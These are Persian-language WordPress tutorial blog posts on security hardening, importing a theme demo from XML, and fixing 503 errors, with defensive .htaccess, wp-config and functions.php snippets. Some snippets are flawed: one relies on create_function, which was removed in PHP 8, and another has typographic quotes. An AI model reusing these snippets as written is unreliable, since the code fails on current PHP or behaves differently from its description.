موضوع دیگه در به روز بودن وردپرس استفاده از افزونه و قالب وردپرس از منابع رسمی و مطمئن هست. متاسفانه به دلیل مشکلات تحریم و بالا بودن نرخ ارز برای خرید محصولات اورجینال بسیاری از سایت‌های فروش قالب و افزونه وردپرس هستند که محصولات منتشر شده را بدون خرید از منابع و با دانلود از سایت‌هایی که مشخص نیست با چه هدفی این فایل‌ها را برای دانلود قرار داده‌اند باعث نفوذ و هک سایت می‌شوند. بیشترین عاملی که مربوط به هک وردپرس میشه به دلیل همین مسئله رخ میده، پس سعی کنید تا جای ممکن حتما قالب و افزونه‌ای که استفاده می‌کنید را از منبع اصلی خریداری کنید.

2. بک‌آپ گیری منظم وردپرس

بعد از هک شدن یک سایت وردپرسی معمولا کدهای مخرب در سایت قربانی تزریق میشه که در اکثر مواقع شاید متوجه این مسئله نشوید. از سوی دیگه نمیشه به بک آپ گیری که میزبان شما تهیه میکنه زیاد مطمئن بود. چرا که برای چندین میزبانی این مشکل پیش اومده که به دلیل گرفتن هاردهای سرور توسط پلیس آلمان بسیاری از سایت‌ها به صورت کامل از صفحه اینترنت محو شدند و برای مشتریان هم هیچ توضیحی قابل هضم نبوده و کلی زحمت که برای رشد یک سایت داشتند به خاطر سهل انگاری در بک آپ گرفتن توسط مدیران سایت‌ها به باد رفت.

پس سعی کنید همیشه خودتون هم از سایت نسخه بک آپ تهیه کنید تا اگر مشکلات این چنین رخ داد یا سایت هک شد بتونید از فایل بک‌آپ برای اطمینان از سالم بودن کلیه فایل‌ها موجود در سایت به ادامه فعالیت بپردازید. بک آپ گیری از سایت همواره بهترین انتخاب برای رفع مشکلات ناخوشایند در سایت است. که میتونید با استفاده از مقاله آموزش تهیه نسخه پشتیبان از پایگاه داده وردپرس با نحوه بک آپ گیری از دیتابیس وردپرس و فایل‌های آن آشنا شوید.

3. افزایش امنیت فایل wp-config.php

فایل wp-config.php یکی از مهم‌ترین فایل‌های هر سایت وردپرسی است که اطلاعات دیتابیس در این فایل قرار دارد. بنابراین در حفظ اطلاعات این فایل باید دقت کافی را داشته باشید و با استفاده از هر ترفندی که میدونید دسترسی به این فایل را محدود کنید تا کسی جز خود شما قادر به مشاهده این فایل نباشد. در مقاله آموزش مدیریت فایل کانفیگ وردپرس به تعدادی از راهکارهای که هم میتونید از خود این فایل محافظت کنید و هم اینکه سایر کارهای امنیتی را روی وردپرس پیاده سازی کنید پرداختم که پیشنهاد می‌کنم از این موارد استفاده کنید.

4. افزایش امنیت فایل htaccess.

یکی دیگه از فایل‌های مهم در وردپرس htaccess. هست که با استفاده از اون میشه کارهای مختلفی را روی هر سایت اعمال کرد. این فایل با استفاده از دستوراتی که میتونه اجرا کنه در محافظت از فایل‌ها و پوشه‌های وردپرس نقش به‌سزایی را داره که میتونید با استفاده کردن از دستورات فایل htaccess. امنیت سایت را افزایش دهید.

برای افزایش امنیت در وردپرس با htaccess. هم میتونید از دستوراتی که در مقاله آموزش کار با htaccess. در وردپرس به اونها پرداختم استفاده کنید.

5. افزایش امنیت پوشه wp-admin

پوشه wp-admin هم یکی از مهم‌ترین پوشه‌های وردپرس هست که همونطور که از اسم این پوشه مشخصه کارهای مربوط به مدیریت پیشخوان وردپرس را به عهده داره که با دسترسی به این پوشه میشه به راحتی با تزریق کدهایی در فایل‌های موجود در این پوشه به صورت کلی پیشخوان وردپرس را به هم ریخت. برای افزایش امنیت این پوشه میتونید از کارهایی مثل رمزگذاری روی پوشه wp-admin در هاست سی پنل استفاده کنید.

6. استفاده از رمز عبور قوی و سطح دسترسی

ساده‌ترین راه و شایع‌ترین روش برای هک و نفوذ در سایت‌های وردپرسی به دلیل استفاده از رمز عبور سست به وجود میاد. موضوع استفاده نکردن از رمز قوی صرفا محدود به وردپرس نیست و اگر پیگیر اخبار فناوری بوده باشید، هر ساله گزارشات بسیار زیادی مبنی بر هک ایمیل کاربران منتشر میشه که در اون از رمزهای سست و معمولی استفاده کرده بودند.

استفاده از رمز عبور صرفا محدود به رمز استفاده شده در وردپرس نیست. بلکه باید برای هر بخش از سایت خودتون مثل ورود به هاست، اکانت FTP، دیتابیس سایت و… هم از رمز قوی استفاده کنید.

انتخاب سطح دسترسی درست برای کاربران هم یکی دیگه از نکاتی هست که باید بهش توجه داشته باشید. معمولا در سایت‌های زیادی که به صورت تیمی عمل می‌کنند بیشتر اعضای تیم دارای نقش کاربری مدیرکل هستند که همین مسئله باعث میشه امنیت وردپرس در خطر قرار بگیره. باید این نکته را به خاطر داشته باشید که هیچ لزومی نداره شما که تیم تشکیل دادید حتما باید همه اعضا دارای نقش کاربری مدیر کل باشند، چرا که لو رفتن رمز یکی از کاربران باعث میشه تا کل سایت هک بشه. کافیه یکی از اعضا که مسئولیت کدنویسی و طراحی بخش سایت را داره این نقش کاربری را داشته باشه و بقیه اعضای تیم از نقش‌هایی مثل نویسنده و ویرایشگر استفاده کنند.

7. افزایش امنیت صفحه ورود به وردپرس

صفحه ورود در وردپرس یکی از صفحات مهمی هست که نگهداری از اون هم برای جلوگیری از هک سایت و هم برای جلوگیری از حملات DDOS بسیار مهم و کلیدی هست. بنابراین با به وجود اومدن روش‌های امنیتی مثل قرار دادن سوال امنیتی، استفاده از ورود دو مرحله‌ای گوگل و… این روش‌ها هم به وردپرس راه باز کردند که استفاده کردن ازشون میتونه حسابی سایت را ایمن بکنه و در ادامه به معرفی برخی از این روش‌ها می‌پردازم.

تغییر آدرس صفحه ورود به وردپرس

وردپرس به صورت پیشفرض از آدرس wp-login.php برای صفحه ورود استفاده میکنه که با مراجعه کردن به آدرس wp-admin هم به صورت خودکار به این صفحه هدایت خواهید شد. بنابراین اگر شخصی نام کاربری و رمز شما را بدونه به راحتی میتونه وارد پیشخوان وردپرس شده و کارهایی را در اون انجام بده. برای همین میتونید این آدرس و آدرس wp-admin را تغییر داده و از آدرس دلخواه استفاده کنید که در مقاله آموزش تغییر آدرس ورود به پیشخوان یا مدیریت وردپرس و آموزش تغییر آدرس ورود به مدیریت وردپرس به معرفی افزونه‌ای برای این کار پرداختم.

محدودیت در تعداد دفعات ورود به وردپرس

وردپرس به صورت پیشفرض هیچ محدودیتی برای تعداد دفعات تلاش برای ورود در سایت قرار نداده. اما راهکاری وجود داره که میتونید تعداد دفعات را در ورود به وردپرس محدود کنید به طوری که اگر بیش از تعداد دفعات مشخص شده شخصی در صدد ورود به سایت بود برای مدت مشخص شده‌ای دیگه حتی با رمز و نام کاربری درست هم قادر به ورود در وردپرس نباشند. که در مقاله آموزش محدود کردن تعداد دفعات ورود در وردپرس به این موضوع پرداختم.

محدودیت در ورود با ایمیل در وردپرس

از نسخه 3 به بعد وردپرس قابلیتی به این سیستم مدیریت محتوا اضافه شد که علاوه بر نام کاربری بتونید با ایمیلی که دارید هم در وردپرس وارد شوید. بنابراین از اونجایی که با ایمیل استفاده شده با بسیاری از افراد در ارتباط هستید پس امکان نفوذ در سایت به ندونستن نام کاربری فراهم خواهد بود. برای غیرفعال کردن این قابلیت وارد هاست خودتون شده و سپس به مسیر /public_html/wp-content/themes/ مراجعه کنید. حالا وارد پوشه قالبی که ازش استفاده می‌کنید شده و قطعه کد زیر را در فایل فانکشن(functions.php) قالب قرار داده و ذخیره کنید.

remove_filter( ‘authenticate’,’wp_authenticate_email_password’, 20 );

بعد از قرار دادن کد بالا دیگه امکان ورود با ایمیل در وردپرس را نخواهید داشت و فقط با استفاده از نام کاربری میتونید وارد وردپرس شوید.

استفاده از کپچا وردپرس

یکی از راه‌های حمله به وردپرس با استفاده از تلاش برای ورود در سایت یا ارسال دیدگاه اسپم صورت میگیره که حتما هم لزومی نداره فرد وارد سایت بشه و بلکه هدف از این کار اینکه که مدام درخواستی به سایت شما ارسال شده و CPU و منابع هاست شما درگیر میشه و در نهایت سایت از دسترس خارج خواهد شد. برای جلوگیری از این کار میتونید از کپچا وردپرس استفاده کنید. استفاده از کپچا میتونه از نظرات اسپم هم جلوگیری بکنه که با استفاده از مقاله آموزش ساخت کپچا در وردپرس میتونید این امکان را در وردپرس فراهم کنید.

ورود دو مرحله‌ای گوگل در وردپرس

تقریبا دو سالی هست که گوگل برنامه Google Authenticator را برای فراهم کردن قابلیت ورود دو مرحله‌ای فراهم کرده است. در این پروژه دیگه نیازی نیست که حتما کد تایید برای ورود به اکانت را از طریق SMS روی شماره دریافت کنید، بلکه میتونید برنامه مخصوص اندروید و IOS را روی گوشی خودتون نصب کرده و کدهایی که به صورت خودکار در این برنامه تولید میشه را برای کد ورود استفاده کنید. این سیستم محدود به محصولات گوگل نیست و با استفاده از این قابلیت میتونید امکان ورود دو مرحله‌ای گوگل در وردپرس را هم فراهم کنید.

افزودن سوال امنیتی در صفحه ورود وردپرس

یکی دیگه از راه‌های افزایش امنیت در وردپرس استفاده از قابلیت سوال و جواب امنیتی است. در این روش هر کاربر میتونه با مراجعه به صفحه شناسنامه یکی از سوالات امنیتی را انتخاب کرده و با تعیین جواب وقتی اقدام به ورود در سایت میکنه تا زمانی که جواب تعیین شده را وارد نکرده قادر به ورود در وردپرس نخواهد بود. برای استفاده از این قابلیت هم میتونید از مقاله آموزش افزودن پرسش و پاسخ امنیتی در وردپرس استفاده کنید.

غیرفعال کردن پیغام خطاهای وردپرس

وقتی نام کاربری یا رمز عبور اشتباهی در صفحه ورود وردپرس وارد کنید پیام “نام کاربری xxx اشتباه است و یا شناسه معتبر نیست” نمایش داده می‌شود. هکر با توجه به پیام نمایش داده شده تشخیص میده که کدوم یکی از اطلاعات ورود اشتباه هستند و در نهایت بعد از یافتن یکی از اطلاعات درست میتونه روی مورد بعدی تمرکز کرده و در زمان کوتاه‌تری اقدام به هک سایت بکند.

// Remove error message on login screen
add_filter('login_errors', create_function('$a', 'return null;'));

برای غیرفعال کردن این قابلیت کد بالا را در فایل فانکشن(functions.php) قالب خودتون قرار داده و ذخیره کنید.

8. مخفی کردن نام کاربری وردپرس

در اکثر قالب‌های وردپرس وقتی روی نام نویسنده یک نوشته کلیک کنید به صفحه نویسنده هدایت خواهید شد که در اون نام کاربری نویسنده درست همان چیزی است که در آدرس نمایش داده می‌شود. بنابراین اگر میبینید که نیازی به این قابلیت ندارید میتونید چنین امکانی را از قالب خودتون غیرفعال کنید یا اینکه با استفاده از روش‌های موجود آدرس صفحه نویسنده را بر اساس آی‌دی نویسنده تعیین کنید که نام کاربری نویسنده‌ها مشخص نشه که در مقالات بعدی به معرفی این راهکار خواهم پرداخت.

# BEGIN block author scans
RewriteEngine On
RewriteBase /
RewriteCond %{QUERY_STRING} (author=\d+) [NC]
RewriteRule .* - [F]
# END block author scans

با قرار دادن کد بالا در فایل htaccess. هاست خودتون میتونید صفحات مربوط به نویسنده‌ها را در وردپرس به صفحه اصلی ریدایرکت کنید.

9. تغییر پیشوند جداول وردپرس

در حالت پیش‌فرض، وردپرس از _wp به‌عنوان پیشوند جداول در پایگاه داده وردپرس استفاده می‌کنه. حالا در صورتی که هنگام نصب وردپرس اقدام به تغییر دادن آن نکرده باشید امنیت سایت شما از بخش دیتابیس کاهش پیدا خواهد کرد که لازمه اقدام به تغییر پیشوند جداول بکنید. برای این منظور میتونید از مقاله‌های آموزش تغییر پیشوند جداول وردپرس و آموزش تغییر پیشوند جداول وردپرس استفاده کنید.

10. استفاده از SSL در وردپرس

استفاده از پروتکل امن HTTPS این امکان را به سایت شما میده که کلیه داده‌ها در محیطی امن رد و بدل شوند. بنابراین با استفاده از SSL در وردپرس میتونید امنیت سایت را در حالت‌های مختلفی افزایش دهید. پیشنهاد می‌کنم حتما از SSL استفاده کرده و امنیت وردپرس را بیشتر کنید.

11. غیرفعال کردن مشاهده پوشه‌های هاست

یکی از نکاتی که کاربران کمتر بهش توجه می‌کنند و بر اساس کانفیگ هاست ممکنه این قابلیت در هاست غیرفعال نشده باشه مرور پوشه ها در سایت است. Directory browsing میتونه توسط هکرها مورد استفاده قرار گرفته و فایل‌های موجود در هر پوشه به راحتی بررسی شده و با پیدا کردن راه‌های نفوذ به راحتی سایت شما هک شود. این مورد به هینجا محدود نمیشه و افراد میتونند با پیدا کردن پوشه‌های شما فایل‌های موجود در هاست را هم مورد سرقت قرار دهند. بنابراین لازمه این قابلیت را غیرفعال کنید. برای این منظور کارهای زیر را طی کنید.

  1. وارد هاست خود شده و به مسیر public_html مراجعه کنید.
  2. فایل htaccess. را در ریشه وب سایت خود جستجو کرده و سپس برای ویرایش آن اقدام کنید.
  3. دستور Options -Indexes را در انتهای فایل .htaccess اضافه کنید.
  4. در نهایت فایل را ذخیره کنید.
در صورتی که از وردپرس برای ساخت فروشگاه اینترنتی استفاده می‌کنید باید بدانید که فروشگاه ساز ووکامرس این کار را به صورت خودکار انجام می‌دهد و علاوه بر این به گونه‌ای عمل می‌کند که حتی اگر لینک مستقیم فایل آپلود شده برای یک محصول را در اختیار کاربری قرار دهید تا زمانی که وارد هاست نشده باشند قادر به دانلود فایل نخواهند بود.

12. غیرفعال کردن ویرایشگر قالب و افزونه

یکی از قابلیت‌های وردپرس استفاده از ویرایشگر کد در پیشخوان وردپرس هست که در منوهای نمایش و افزونه‌ها قرار داره و با استفاده از این دو منو به ترتیب میتونید به کلیه فایل‌های قالب وردپرس و افزونه وردپرس دسترسی داشته و آنها را ویرایش کنید. اگر شخصی بتونه وارد پیشخوان وردپرس بشه به راحتی میتونه با وارد کردن کدهای مخرب کارهای خراب کارانه در سایتتون ایجاد بکنه که برای غیرفعال کردن این قابلیت میتونید به ترتیب زیر عمل کنید.

  1. وارد هاست خود شده و به مسیر public_html مراجعه کنید.
  2. فایل wp-config.php را که در ریشه هاست قرار دارد را انتخاب کرده و به صفحه ویرایش فایل مراجعه کنید.
  3. حالا قطعه کد زیر را در بخش define این فایل قرار داده و ذخیره کنید.

// Disallow file edit
define( 'DISALLOW_FILE_EDIT', true );

بعد از قرار دادن کد بالا امکان ویرایش فایل‌های قالب و افزونه از طریق ویرایشگر پیشخوان وردپرس غیرفعال خواهد شد.

13. غیرفعال کردن اجرای فایل PHP در وردپرس

هاست به شما این اجازه میده تا هر فایلی را در هر جایی قرار داده و با دستورات PHP هر کاری که میخواهید در سایت انجام دهید. برخی دایرکتوری‌ها هستند که اصلا نیازی به اجرای فایل‌های PHP در اونها نخواهید داشت که مهم‌ترین این بخش پوشه uploads وردپرس هست که فایل‌های چند رسانه‌ای مثل تصویر، ویدئو، صوت و… در این مسیر قرار می‌گیرد. بنابراین لازمه اجرای دستورات PHP را در این مسیر با استفاده از روش زیر غیرفعال کنید.

  1. وارد هاست خود شده و به مسیر public_html/wp-content/uploads مراجعه کنید.
  2. یک فایل با نام htaccess. بسازید و کدهای زیر را در آن قرار دهید.

<Files *.php>
deny from all
</Files>

بعد از قرار دادن کد بالا در فایل htaccess. که در این پوشه قرار داره به صورت کلی امکان اجرای PHP در این مسیر غیرفعال خواهد شد.

14. غیرفعال کردن XML-RPC

فایل XML-RPC وردپرس امکان مدیریت از راه دور را در وردپرس خواهد داد که از جمله این موارد میشه به امکان استفاده از برنامه اندروید، برنامه ویندوز وردپرس یا سرویس‌هایی مثل IFTTT اشاره کرد. با استفاده از تابع system.multicall هکر میتونه همزمان 20 درخواست را به سایت ارسال کرده و اقدام به پیدا کردن رمز ورود در وردپرس بکنه که علاوه بر این امکان حملات DDOS هم از این طریق فراهم هست. پس بهتره با استفاده از مقاله آموزش غیرفعال کردن XML-rpc اقدام به غیرفعال کردن این قابلیت در وردپرس بکنید.

15. بررسی فعالیت کاربران در وردپرس

یکی دیگه از راه‌های امنیت وردپرس این هست که رفتار کاربران سایت خودتون را زیر نظر بگیرید. این رفتار میتونه توسط سیستم آمار گیر سایت و یا افزونه‌ها صورت بگیره که در صورت شناسایی و مشکوک شدن به کاربری کافیه اکانت وی را غیرفعال کرده و یا نقش کاربری وی را برای جلوگیری از کارهای خرابکارانه محدود کنید. برای این منظور هم میتونید از مقاله آموزش مدیریت و کنترل فعالیت کاربران در وردپرس استفاده کنید.

تغییر دوره‌ای رمز کلیه کاربران در وردپرس

معمولا کاربرانی که در سایت ثبت نام می‌کنند هیچ اقدامی برای تغییر دوره‌ای رمز عبور خودشون انجام نمی‌دهند. این مشکلات برای هر سایتی زیاد شاید مهم نباشه و به چشم نیاد، اما برای سایت‌های فروشگاه فایل که از ووکامرس یا افزونه‌های دیگه استفاده می‌کنند خیلی مهم هست. پس خودتون باید دست به کار شده و در بازه‌های زمانی چند ماهه کاری کنید که کاربران خودشون اقدام به تغییر رمز در وردپرس بکنند. در مقاله آموزش تغییر رمز عبور تمام کاربران در وردپرس به این مورد پرداختم.

16. استفاده از افزونه امنیتی wordfence

افزونه‌های امنیتی مختلفی برای وردپرس ساخته شده‌اند که امکان فراهم کردن قابلیت‌های امنیتی را در وردپرس به شما خواهند داد. افزونه wordfence وردپرس یکی از پرطرفدارترین افزونه‌های امنیتی در وردپرس هست که به شما امکان افزایش امنیت وردپرس و جلوگیری از هک سایت را خواهد داد. با استفاده از این افزونه میتونید بیشتر راهکارهایی که در بالا به معرفی اونها پرداختیم را فقط با این افزونه فراهم کنید. در مقاله افزایش امنیت وردپرس و اسکن امنیتی وردپرس با Wordfence Security به معرفی کامل این افزونه پرداختم که میتونید ازش استفاده کنید.

امیدوارم که این آموزش هم مورد توجه و پسند شما قرار گرفته باشه و با استفاده از راهکارهای معرفی شده در این مقاله بتونید امنیت وردپرس را افزایش داده و اقدام به جلوگیری از هک وردپرس و نفوذر در سایت خودتون بکنید. در صورتی که در رابطه با این آموزش سوال یا مشکلی داشتید در بخش دیدگاه‌ها اعلام کنید تا در کوتاه‌ترین زمان ممکن پاسخگوی شما باشم. همچنین اگر راهکار امنیتی دیگه‌ای برای وردپرس سراغ دارید اعلام کنید تا با اضافه کردن به این آموزش کمکی به کاربران وردپرسی کرده باشید.

نوشته آموزش تامین امنیت وردپرس و جلوگیری از هک وردپرس اولین بار در پدیدار شد.

آموزش درون ریزی قالب وردپرس با فایل XML

$
0
0

یکی از امکاناتی که وردپرس کار ما را راحت‌تر کرده قابلیت درون ریزی قالب وردپرس هست که با استفاده از این قابلیت میتونیم به راحتی تنظیمات قالب را درون ریزی کرده و عینا قالب را مشابه با دمو در سایت تنظیم کنیم بدون اینکه نیاز به انجام تنظیمات قالب از ابتدا باشد. معمولا قالب‌هایی که به صورت رایگان در سایت‌ها منتشر می‌شوند دارای فایل درون ریز هستند که بتونید با درون ریزی کردن فایل XML قالب سایت را عینا مشابه دمو به کتاربران نمایش دهید.

در این آموزش از پایگاه دانش میزبان‌فا قصد دارم به آموزش درون ریزی قالب وردپرس با فایل XML بپردازم که از طریق بخش ابزارها وردپرس در اختیار بوده و میتونید تنظیمات قالب را با استفاده از درون ریزی وردپرس در سایت خودتون اعمال کنید.

چرا باید از درون ریزی وردپرس استفاده کنیم؟

یکی از اصلی‌ترین دلایل برای استفاده از درون ریزی وردپرس پیچیده بودن مراحل تنظیمات یک قالب هست که بیشتر کاربران علاقه‌ای به انجام این کار ندارند. بنابراین میتونن با درون ریزی محتوا به راحتی در کوتاه‌ترین زمان ممکن کلیه تنظیمات را بر اساس فایل XML روی سایت اعمال کنند. یا در برخی موارد که قصد تغییرات عمده در قالب سایت دارید میتونید عینا قالب فعلی سایت را در لوکال هاست وردپرس نصب کنید و سپس بعد از اینکه تنظیمات را روی قالب اعمال کردید در نهایت با درون ریزی در سایت تنظیمات قالب را در زمان کوتاهی انجام بدین که در حین انجام تغییرات در سایت دیگه کاربران متوجه بی نظمی در سایت نخواهند شد.

درون ریزی قالب وردپرس با فایل xml صرفا محدود به تنظیمات نیست و با استفاده از این قابلیت میتونید محتوای نوشته‌ها، برگه‌ها، تصاویر و فایل‌های رسانه وردپرس، محصولات ووکامرس و… را هم درون ریزی کنید.

آموزش درون ریزی قالب وردپرس با فایل XML

پیش از این در مقاله آموزش درون ریزی و برون ریزی در وردپرس با نحوه کار قابلیت خروجی گرفتن از داده‌ها در وردپرس آشنا شدیم و دیدیم که با چه روش‌هایی میشه از بخش‌های مختلف وردپرس خروجی تهیه کرده و با وارد کردن در هر جا که لازم داریم بدون طی کردن مراحل زیاد و انجام تنظیمات عینا همان محتوا را منتقل کنیم. درون ریزی برای قالب وردپرس هم دقیقا به همین شکل انجام میگیره که باید به بخش ابزارها مراجعه کرده و بعد افزونه مربوط به درون ریزی برای بخش قالب وردپرس را نصب کنید. در نهایت فایل خروجی گرفته شده را که با فرمت XML هست در سایت درون ریزی کنید. در این آموزش فرض بر این گرفته شده که شما فایل درون ریز را در اختیار دارید، در صورتی که خودتون قصد دارید از یک سایت به سایت دیگه انتقالی انجام بدین باید طبق آموزش درون ریزی و برون ریزی در وردپرس ابتدا از سایت مبدا خروجی تهیه کنید و سپس در سایت مقصد فایل خروجی گرفته شده را درون ریزی کنید. پس از مرحله گرفتن خروجی از سایت مبدا در این آموزش چشم پوشی می‌کنم.

برای شروع کار ابتدا مشابه تصویر زیر به مسیر ابزارها> درون ریزی مراجعه کرده و سپس گزینه هم اکنون نصب کن را که در زیر wordpress قرار داره را انتخاب کرده و منتظر بمانید تا افزونه درون ریزی و برون ریزی در وردپرس نصب شود.

آموزش درون ریزی قالب وردپرس با فایل XML

حالا باید قالب مد نظر خودتون را نصب کرده و فعال کنید تا در مرحله بعدی فایل درون ریز برای قالب را در وردپرس آپلود کنید. بنابراین با استفاده از آموزش نحوه نصب قالب در وردپرس قالب خود را نصب کرده و فعال کنید. بعد از اینکه قالب را فعال کردید به منوی ابزارها> درون ریزی مراجعه کنید تا با صفحه‌ای مشابه تصویر زیر مواجه شوید.

آموزش درون ریزی قالب وردپرس با فایل XML

همونطور که در تصویر میبینید در اینجا باید فایل XML مربوط به قالب خودتون را انتخاب کرده و در سایت آپلود کنید. روی Choose File کلیک کرده و بعد از انتخاب فایل xml قالب روی دکمه بارگذاری پرونده و درون ریزی آن کلیک کرده و منتظر بمونید تا صفحه زیر به شما نمایش داده شود.

آموزش درون ریزی قالب وردپرس با فایل XML

در این مرحله میتونید مشخص کنید که اطلاعاتی که درون ریزی میشه به کدوم کاربر در سایت اختصاص داده بشه، اگر هیچ کاربری را انتخاب نکنید کاربری که در فایل درون ریز وجود داره اطلاعات برای همون کاربر ثبت خواهد شد، اما اگر قصد دارید محتوای درون ریزی شده به نام شما در سایت درون ریزی بشه از قسمت یا نوشته‌ها را به کاربر فعلی اختصاص بده نام کاربری خود را از بین لیست کاربران انتخاب کنید. اگر هم قصد دارید یک کاربر جدید ایجاد کنید کافیه یک نام کاربری برای وی انتخاب کنید.

اگر قصد دارید تصاویر و فایل‌های آپلود شده هم در سایت بارگیری شده و درون ریزی شوند تیک گزینه دانلود و درون ریزی فایل‌های پیوست را فعال کرده و در نهایت روی دکمه تایید کلیک کنید.

بسته به حجم فایل‌ها و مشخصات هاست شما این کار مدتی طول خواهد کشید، بنابراین تا انتهای تکمیل شدن مرحله درون ریزی تنظیمات قالب در وردپرس منتظر بمونید تا کلیه داده‌ها از طریق فایل XML درون ریزی شوند و در نهایت به صفحه‌ای مشابه تصویر زیر هدایت شوید.

آموزش درون ریزی قالب وردپرس با فایل XML

در این مرحله نتیجه درون ریزی تنظیمات قالب در وردپرس به شما نمایش داده خواهد شد. در اینجا من عمدا افزونه فرم تماس 7 را حذف کردم که ببینید اطلاعاتی که درون ریزی نمی‌شوند به چه شکل در صفحه نتیجه درون ریزی تنظیمات قالب در وردپرس نمایش داده خواهند شد. بعد از درون ریزی کامل داده‌ها کافیه سایت خودتون را باز کنید و ببینید که دقیقا قالبی که نصب کردید مثل دمو نمایش داده خواهد شد.

امیدوارم که این آموزش هم مورد توجه و پسند شما قرار گرفته باشه و با استفاده از این آموزش تونسته باشید نحوه درون ریزی تنظیمات قالب در وردپرس با استفاده از فایل XML را یاد بگیرید. در صورتی که هنگام درون ریزی قالب در وردپرس با مشکلی مواجه شدید یا سوالی براتون پیش اومده در بخش دیدگاه‌ها اعلام کنید تا در کوتاه‌ترین زمان ممکن پاسخگوی شما باشم.

نوشته آموزش درون ریزی قالب وردپرس با فایل XML اولین بار در پدیدار شد.

آموزش نحوه رفع خطای 503 در وردپرس

$
0
0

خطای 503 Service Unavailable در وردپرس یکی از مشکلات شایعی هست که معمولا در بیشتر سایت‌ها رخ میده و مطمئنا تا به حال سایت شما هم چندین بار با این مشکل مواجه شده و یا اینکه حداقل در سایت های دیگه با این خطا مواجه شدید. خطای 503 در وردپرس به دلایل مختلفی میتونه رخ بده که برای رفع ارور 503 در وردپرس باید تک تک این عوامل را بررسی کنید و ببینید مشکل از کجای سایت هست و اونو رفع کنید. معمولا بیشترین دلایلی که باعث بروز ارور 503 در وردپرس میشه شامل موارد زیر هستند.

  • وجود باگ و خطای برنامه نویسی در کدهای قالب و افزونه وردپرس
  • ایجاد ناسازگاری در اجرای کدهای PHP به دلیل تغییرات انجام شده روی سرور
  • کم بودن میزان منابع هاست و مصرف بیش از حد منابع هاست و CPU در وردپرس
  • انجام حملات مخرب روی هاست به صورت DDOS
  • و…

حالا اگر به هر یک از دلایل بالا ارور 503 در سایت وردپرسی شما ایجاد شده باشه میتونید با راهکارهایی که در این مقاله از پایگاه دانش میزبان‌فا به معرفی اونها می‌پردازم خطاها را برطرف کنید. در بیشتر موارد با استفاده از راهکارهای ارائه شده حل خواهند شد و اگر با این راهکارها مشکل برطرف نشد به دلیل محدود بودن دسترسی شما به هاست میتونید از میزبانی سایتتون بخواهید تا مشکل را بررسی و مرتفع کنند.

آموزش رفع ارور 503 در وردپرس

ارور 503 وردپرس با پیغام‌های مختلفی نمایش داده خواهد شد که دلیل اون هم به نحوه کانفیگ و پیکربندی سرور برمیگرده که در هر نوع کانفیگ و پیکربندی به یک نوع خاصی خطا 503 نمایش داده میشه که در زیر نمونه‌هایی از اون را میبینید.

  1. 503 Service Unavailable
  2. Http/1.1 Service Unavailable
  3. HTTP Server Error 503
  4. 503 Error
  5. 503 HTTP Error
  6. HTTP 503

این خطا به هر شکل از موارد بالا که نمایش داده بشه به حال سایت شما فرقی نمیکنه و با استفاده از راهکارهایی که در این مقاله ارائه می‌کنم به راحتی میتونید خطا را برطرف کنید.

1. ارور 503 در وردپرس به دلیل خطا در کدنویسی افزونه

افزونه‌های مخرب در وردپرس و استفاده از افزونه‌هایی که به درستی کدنویسی نشده‌اند همیشه بیشترین سهم را در ایجاد خطای 503 در هاست دارند. از طرفی دیگر عدم نصب افزونه از مخزن وردپرس باعث ایجاد تاثیر بدتر از این نظر میشه که برخی با دانلود افزونه از مخازن نامعتبر اقدام به نصب افزونه در وردپرس می‌کنند که به دلیل وجود کدهای مخرب یا قدیمی باعث ایجاد مشکل 503 در وردپرس می‌شوند. در صورتی که بعد از نصب، به‌روزرسانی یا حذف یک افزونه سایت با خطای 503 مواجه شد شک نکنید که مشکل از افزونه‌ها در وردپرس هست. اما گاهی هم پیش میاد که به دلیل به‌روزرسانی نرم افزارهای سرور این خطا بخاطر ناسازگاری در کدهای افزونه ایجاد خواهد شد. پس در موارد بسیار کمی این مشکل به دلیل خطا در کدهای php هم ایجاد میشه.

برای اطمینان بیشتر از این موضوع وارد هاست خودتون شده و روی File Manager کلیک کنید تا به بخش مدیریت فایل‌ها در هاست هدایت شوید. سپس به مسیر /public_html/ مراجعه کرده و به دنبال فایل error_log در هاست خودتون بگردید. سپس در هاست سی پنل روی فایل راست کلیک کرده و گزینه view را انتخاب کنید تا خطاهای موجود در این فایل را بررسی کنید.

همونطور که میبینید در ابتدای هر خط تاریخ و زمان درج شده که باید در بین فایل error_log دنبال زمانی بگردید که درست در همون موقع با خطای 503 در وردپرس مواجه شدید. سپس جزییات را ببینید که مسیر نمایش داده مربوط به چه جایی هست. در اینجا خطایی که برای من پیش اومده بود به دلیل خطا و ایجاد تداخل در افزونه AMP وردپرس بوده که مسیر دقیق فایل و خط مربوط به کد در فایل error_log درج شده که در نهایت اقدام به غیر فعال کردن افزونه amp در وردپرس کردم.

بنابراین در اولین اقدام باید این افزونه را غیرفعال کنید. اگر به پیشخوان وردپرس دسترسی دارید کافیه وارد مسیر افزونه‌ها شده و افزونه مد نظر را غیرفعال کنید. اما اگر امکان دسترسی به پیشخوان وجود نداره میتونید وارد هاست شده و به مسیر /public_html/wp-content/plugins/ در File Manager هاست مراجعه کنید و در نهایت نام پوشه افزونه مد نظر را به اسم دیگری تغییر دهید.

نحوه رفع ارور 503 در وردپرس و حل مشکل http error 503 ورپرس

برای تغییر نام کافیه پوشه افزونه را انتخاب کرده و بعد از راست کلیک کردن روی پوشه گزینه Rename را انتخاب کرده و به انتهای نام افزونه عبارت old- یا یک عدد را اضافه کرده و ذخیره کنید. در این صورت مشکل برطرف شده و دیگه خطای 503 را نخواهید دید.

غیرفعال کردن افزونه‌ها

اما گاهی پیش میاد که نه تنها به پیشخوان وردپرس دسترسی ندارید بلکه به دلایلی امکان مشاهده فایل error_log را هم ندارید. پس در این صورت باید کلیه افزونه‌ها را از طریق هاست غیرفعال کنید. برای این منظور هم باید به مسیر /public_html/wp-content/ در File Manager هاست مراجعه کرده و پوشه plugins را انتخاب کرده و بعد از راست کلیک کردن روی پوشه گزینه Rename را انتخاب کنید. حالا به انتهای نام پوشه عبارت old- یا یک عدد را اضافه کنید.

نحوه رفع ارور 503 در وردپرس و حل مشکل http error 503 ورپرس

